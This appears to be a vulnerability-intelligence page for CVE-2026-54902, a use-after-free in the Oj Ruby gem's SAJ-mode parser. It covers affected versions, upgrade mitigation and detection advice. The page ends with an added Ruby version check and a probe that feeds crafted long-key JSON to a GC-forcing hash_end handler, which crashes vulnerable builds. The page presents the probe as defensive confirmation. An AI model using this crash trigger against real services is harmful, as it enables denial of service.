CVE-2026-54902
Status: Received (Intake)

BaseFortify

Vulnerability report for CVE-2026-54902, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-01

Last updated on: 2026-07-01

Assigner: GitHub, Inc.

Description

Oj (Optimized JSON) is a JSON parser and Object marshaller packaged as a Ruby gem. Prior to version 3.17.2, Oj is vulnerable to Use-After-Free when in SAJ mode. The Oj::Parser does not protect cached object keys (≥ 35 bytes) from garbage collection, and a Ruby callback that triggers GC inside hash_end can cause the key string to be reclaimed while the C parser still holds a pointer to it. The subsequent access to the freed string VALUE results in a segfault, confirmed by an RIP pointing to address 0x4242 (a canary-style pattern suggesting control over the freed memory's content). This issue has been fixed in version 3.17.2.

CVSS Scores

None listed on this page.

EPSS Scores

Probability: not yet evaluated
Percentile: not yet evaluated

Meta Information

Published: 2026-07-01
Last Modified: 2026-07-01
Generated: 2026-07-01
AI Q&A: 2026-07-01
EPSS Evaluated: N/A
Source: NVD

Affected Vendors & Products

1 associated CPE:

Vendor: ohler55
Product: oj
Version / Range: all releases before 3.17.2 (3.17.2 is the fixed release and is excluded)

Helpful Resources

Exploitability

CWE: CWE-416 (Use After Free). The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory "belongs" to the code that operates on the new pointer.

KEV: no entry shown on this page.

Mitigation Strategies

The immediate mitigation step is to upgrade the Oj gem to version 3.17.2 or later, where this use-after-free vulnerability has been fixed.

Until the upgrade is applied, do not pass untrusted JSON to Oj::Parser in SAJ mode. Key length is under the sender's control, so keeping your own keys under 35 bytes is not a workaround; the advisory scopes the issue to SAJ mode, so parsing untrusted input with a different Oj mode or another JSON library avoids the affected code path in the meantime.

Executive Summary

CVE-2026-54902 is a use-after-free (CWE-416) in the Oj Ruby gem, a JSON parser and object marshaller, affecting versions before 3.17.2 when Oj::Parser is used in SAJ (Simple API for JSON, Oj's SAX-style callback) mode. The parser caches object keys of 35 bytes or more as Ruby String VALUEs but does not protect them from garbage collection. MRI can run GC on any allocation, so an application's hash_end callback that does ordinary work (building objects, appending to arrays) is enough to trigger it; when that happens, the cached key strings can be reclaimed while the C parser still holds pointers to them. The parser's next access to the freed VALUE crashes the process, and the reporter's crash showed the instruction pointer loaded with 0x4242, a pattern from the freed memory, which suggests that memory's contents can be influenced.

Impact Analysis

Any application that feeds untrusted JSON to Oj in SAJ mode on an affected version can be crashed by crafted input, a denial of service against the Ruby process (and, for a single-process server, the whole service). The confirmed outcome is the segfault. The RIP value of 0x4242 in the reporter's crash shows the freed string slot was reallocated and filled with recognizable bytes before the parser dereferenced it, which is the precondition for turning a use-after-free into control-flow hijack; the advisory does not demonstrate code execution, so treat that as unproven but plausible and prioritize the upgrade accordingly.

Detection Guidance

On an affected Oj release (before 3.17.2) the bug surfaces as a segmentation fault of the Ruby process while Oj::Parser is parsing in SAJ mode, with the fault inside Oj's native extension (oj.so) rather than in interpreted Ruby code. Reactive detection means watching for crashes of Ruby processes that parse untrusted JSON with an Oj version before 3.17.2; the more reliable signal is an inventory of installed gem versions (Gemfile.lock, or `bundle list | grep oj`) matched against the fixed version.

The advisory's reference to RIP pointing to 0x4242 describes the reporter's reproduction, where the freed memory was filled with a recognizable pattern; it is not a signature that production crash logs will contain. A real trigger will fault at an arbitrary address, so match on the crashing library and the SAJ code path, not on that constant.

To confirm exposure in a test environment, run a SAJ parse with a handler whose hash_end callback forces garbage collection, over a document with object keys of 35 bytes or more, against the installed Oj version: a crash confirms a vulnerable build, and a clean run on 3.17.2 or later confirms the fix.

The linked resources do not provide explicit detection commands.
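The version check and the confirmation test described above, as an added example that is not part of this page, the advisory, or the Oj project's own code: a version gate for CVE-2026-54902 plus a SAJ probe that drives Oj::Parser with a handler forcing a full GC inside hash_end over a constructed document of 40-byte keys. The handler method names follow Oj's documented SAJ delegate interface (hash_start, hash_end, array_start, array_end, add_value) and the `Oj::Parser.new(:saj)` / `handler=` calls are assumed from that documentation; the helper names (`oj_vulnerable?`, `installed_oj_version`, `long_key_document`, `GcInHashEnd`, `probe_saj`) and the JSON input are this example's own. Run the probe only in a disposable process, because on an affected build the expected outcome is a segfault.

```ruby
# Added example for CVE-2026-54902; not from the advisory or the Oj project.
# Helper names (oj_vulnerable?, installed_oj_version, long_key_document,
# GcInHashEnd, probe_saj) are this example's own.
require 'rubygems'

# First release carrying the fix, per the advisory.
FIXED_OJ_VERSION = Gem::Version.new('3.17.2')

# True for every Oj release before 3.17.2 (the advisory's affected range).
def oj_vulnerable?(version_string)
  Gem::Version.new(version_string) < FIXED_OJ_VERSION
end

# Installed Oj version from RubyGems metadata, or nil when oj is not installed.
def installed_oj_version
  spec = Gem.loaded_specs['oj'] ||
         Gem::Specification.find_all_by_name('oj').max_by(&:version)
  spec && spec.version.to_s
end

# Constructed test input: nested objects whose keys are all >= 35 bytes, the
# threshold above which the advisory says the parser caches the key string.
# Each key maps to an inner object so hash_end fires once per long key.
def long_key_document(key_count: 64, key_len: 40)
  raise ArgumentError, 'keys must be at least 35 bytes' if key_len < 35

  pairs = Array.new(key_count) do |i|
    key = "k#{i}".ljust(key_len, 'x')   # exactly key_len ASCII bytes
    "\"#{key}\":{\"v\":#{i}}"
  end
  "{#{pairs.join(',')}}"
end

# SAJ handler that forces a full GC from hash_end, the callback the advisory
# names as the trigger. Method names follow Oj's documented SAJ delegate.
class GcInHashEnd
  attr_reader :hash_ends, :values

  def initialize
    @hash_ends = 0
    @values = 0
  end

  def hash_start(_key); end
  def array_start(_key); end
  def array_end(_key); end

  def hash_end(_key)
    @hash_ends += 1
    # Reclaims any key VALUE the parser cached without protecting it.
    GC.start(full_mark: true, immediate_sweep: true)
  end

  def add_value(_value, _key)
    @values += 1
  end
end

# Drives Oj::Parser in SAJ mode over `json`. Returns nil when Oj is not
# installed; on an affected build the expected result is a segfault, on
# 3.17.2 or later a hash of callback counters. Use a disposable process.
def probe_saj(json)
  begin
    require 'oj'
  rescue LoadError
    return nil
  end
  handler = GcInHashEnd.new
  parser = Oj::Parser.new(:saj)   # assumed API shape from Oj's Oj::Parser docs
  parser.handler = handler
  parser.parse(json)
  { version: Oj::VERSION, hash_ends: handler.hash_ends, values: handler.values }
end

if __FILE__ == $PROGRAM_NAME
  v = installed_oj_version
  if v.nil?
    puts 'oj not installed; version gate only'
  else
    puts "oj #{v}: #{oj_vulnerable?(v) ? 'VULNERABLE (< 3.17.2)' : 'fixed'}"
  end
  puts probe_saj(long_key_document).inspect
end
```

`probe_saj` returns nil when the oj gem is absent, so the version gate runs anywhere; the parse itself only exercises the affected code path when Oj is present, and a clean return of the counters on 3.17.2 or later is the positive confirmation of the fix.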
